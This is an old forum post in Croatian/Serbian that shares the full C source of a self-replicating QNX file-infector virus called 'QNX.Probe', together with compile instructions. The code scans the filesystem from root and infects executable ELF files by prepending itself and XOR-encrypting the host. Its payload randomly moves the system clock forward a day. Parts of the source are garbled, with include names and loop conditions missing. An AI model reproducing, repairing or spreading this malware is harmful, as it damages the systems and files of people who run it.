[ uLtracode @ 22.09.2001. 22:08 ] @
QNX VIRUS !!! - 2001-09-21 @ 22:48:18 by Boris Posilovic OS: QNX; Oblast: Virus; Oba?; Evo, opet vam donosim još jedan ekskluzivan kod! Ovaj put QNX Virus pod imenom QNX.Probe v1.1. Ovaj crv QNX EFL dolazi kao dokument, crv je parazitskoga tipa, nalazi se u skrivenim procesima tako da se skriva od ostalih korisnika. Inficira EFL dokumente u sistemu, ima QNX playlod dodatak koji je napisan samo za ovaj virus i QNX OS. Ovaj crv je jako opasan, pa zato pazite! Nadam se da vise nećete misliti da samo Windowsi imaju viruse, došlo je vreme UNIX virusa :))). Ovaj virus je prirodan QNX virus, nije klon UNIX virusa. Uživajte... Treba kompajrilati: cc probeb.c , strip probeb #include // Declare necessary libraryes #include #include #include #include #include #include #define virus_len 5440 // Define the size of the virus body #define work_path "/" // Define the initial directory for scan, // where virus will be looking for the files #define byte_block virus_len // Define block size (used while copying) #define name_len sizeof(our_name) // Define the size of virus name char our_name[] = "QNX.Probe.b"; // Virus name and the infection mark // at the same time int our_fd, tmp_fd; // Declare variables char buffer[byte_block], buffer1[byte_block], vir_buf[virus_len]; int process_file(const char*, const struct stat*, int); // Declare used void check_payload(void); // functions int main(int argc, char **argv, char **envp) // Main function { char *exec_tmp; // Declare yet another variables ssize_t bytes_cnt; pid_t pid; if ((our_fd = open(argv[0], O_RDONLY)) != -1) // Open currently runned file { // If file was opened, proceed the next commands... if (read(our_fd, vir_buf, virus_len) == -1) exit(-1); // Read virus_len bytes from this file exec_tmp = tempnam(NULL, argv[0]); // Create the name for temporary file if ((tmp_fd = open(exec_tmp, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1) // And open this file { // If an error has occured whilt opening... close(our_fd); // Close ourself exit(-1); // Exit with error } while(1) { // Decryption procedure unsigned csum0; // Declare yet another variable if (read(our_fd, &csum0, 4) != 4) break; // Read 4 bytes (there must be the checksum // of the next going block bytes_cnt = read(our_fd, buffer, byte_block); // Read next going block if (bytes_cnt == 0) break; // If no bytes was readed - // exit procedure encryption for(;;) { // Decryption int key = rand() % 10000; // Take random key int i; // Declare yet another.... unsigned csum=0; // And another.... for(i=0; i { buffer1 = buffer ^ key; // XOR it with a key key += our_name[i % name_len] ^ i; // Modify key } for(i=0; i // the uncrypted block { csum += buffer1 ^ i; // Get the checksum csum = (csum >> 1) | (csum << 31); // Crypt it } if (csum == csum0) break; // If current checksum is equial to // the saved - stop uncryption } // Decryption ends write(tmp_fd, buffer1, bytes_cnt); // Write uncrypted buffer // to the temp file } // Finish decription close(tmp_fd); // Close temp file close(our_fd); // Close ourself check_payload(); pid = fork(); // system call fork() if (pid == 0) // If it is parent process { execve(exec_tmp, argv, envp); // Run temp file unlink(exec_tmp); // If an error - delete temp file exit(-1); // and exit with an error } else if (pid > 0) // If it is not a parent process { ftw(work_path, process_file, 1); // Scan directory tree and for each // founded file call process_file() } unlink(exec_tmp); // Delete temp file exit(0); // Exit } } // End of the function "main()" int process_file(const char *vic_name, const struct stat *status, int type) { // Function "process_file()" int vic_perm, vic_fd, bytes_cnt; // Declare necessary variables vic_perm = status->st_mode; // Take file permissions if ((status->st_mode&S_IFREG) && (status->st_mode&(S_IXUSR|S_IXGRP|S_IXOTH))) { // If it is a regular and executable file... char *tmp_name; // Declare...... if (chmod(vic_name, S_IRUSR|S_IWUSR) == -1) return 0; // Change permissions to the // readable/writeable for current user // If an error - exit function if ((vic_fd = open(vic_name, O_RDWR)) == -1) // Open victim file for read/write { // If an error has occured while opening... chmod(vic_name, vic_perm); // Restore original permissions return 0; // Exit function } tmp_name = tempnam(NULL, "tmp"); // Create temp file name if ((tmp_fd = open(tmp_name, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1) // Open temp file { // If an error was occured while opening close(vic_fd); // Close victim file chmod(vic_name, vic_perm); // Restore it`s permissions return 0; // Exit function } if ((bytes_cnt = read(vic_fd, buffer, byte_block)) == -1) // Read block from victim { // If an error... close(vic_fd); // Close victim file close(tmp_fd); // Close temp file unlink(tmp_name); // Delete temp file chmod(vic_name, vic_perm); // Restore victim`s permissions return 0; // Exit function } if (bytes_cnt > name_len) { // If was readed more than "name_len" bytes char *i; // Declare..... for(i=buffer; i<(buffer+byte_block-name_len); i++) // For all readed bytes { if ((!strcmp(i, our_name)) || (strncmp(buffer+1, "ELF", 3))) { // If victim file is infected or isn`t an ELF file close(vic_fd); // Close victim file close(tmp_fd); // Close temp file unlink(tmp_name); // Delete temp file chmod(vic_name, vic_perm); // Restore permissions return 0; // Exit function } } } lseek(vic_fd, 0, SEEK_SET); // Go to the beginning of the victim write(tmp_fd, vir_buf, virus_len); // Write virus body to the temp file while((bytes_cnt = read(vic_fd, buffer, byte_block)) > 0) // For all bytes of the block of the // victim body { // Encryption procedure int i; // int key = rand() % 10000; // Declare... unsigned csum=0; // And again... for(i=0; i { csum += buffer ^ i; // Get the checksum... csum = (csum >> 1) | (csum << 31); // Crypt it } for(i=0; i { buffer ^= key; // XOR byte key += our_name[i % name_len] ^ i; // Modify the key } // } Encryption ends write(tmp_fd, &csum, 4); // Write checksum to the temp file write(tmp_fd, buffer, bytes_cnt); // write block to the temp file } close(vic_fd); // Close victim close(tmp_fd); // Close temp file if (rename(tmp_name, vic_name) == -1) // Rename temp file to the victim { // If an error was occured while renaming... unlink(tmp_name); // Delete temp file } chmod(vic_name, vic_perm); // Restore victim`s permissions } return 0; // Exit function } // End of the function "process_file()" void check_payload(void) { // Payload function srand(time(NULL)); // Initialize randomer if (rand() % 900 == 555) // If random number equal to 555 { struct timespec the_time; // Declare....... clock_gettime(CLOCK_REALTIME, &the_time); // Get calendar time the_time.tv_sec += (60 * 60) * 24; // Add one day the_time.tv_nsec = 0; // Must to be zero clock_settime(CLOCK_REALTIME, &the_time); // Set new calendar time } } OVO samo postavio jer je zanimljivo da i male unix verzije mogu imati opasnost od virusa |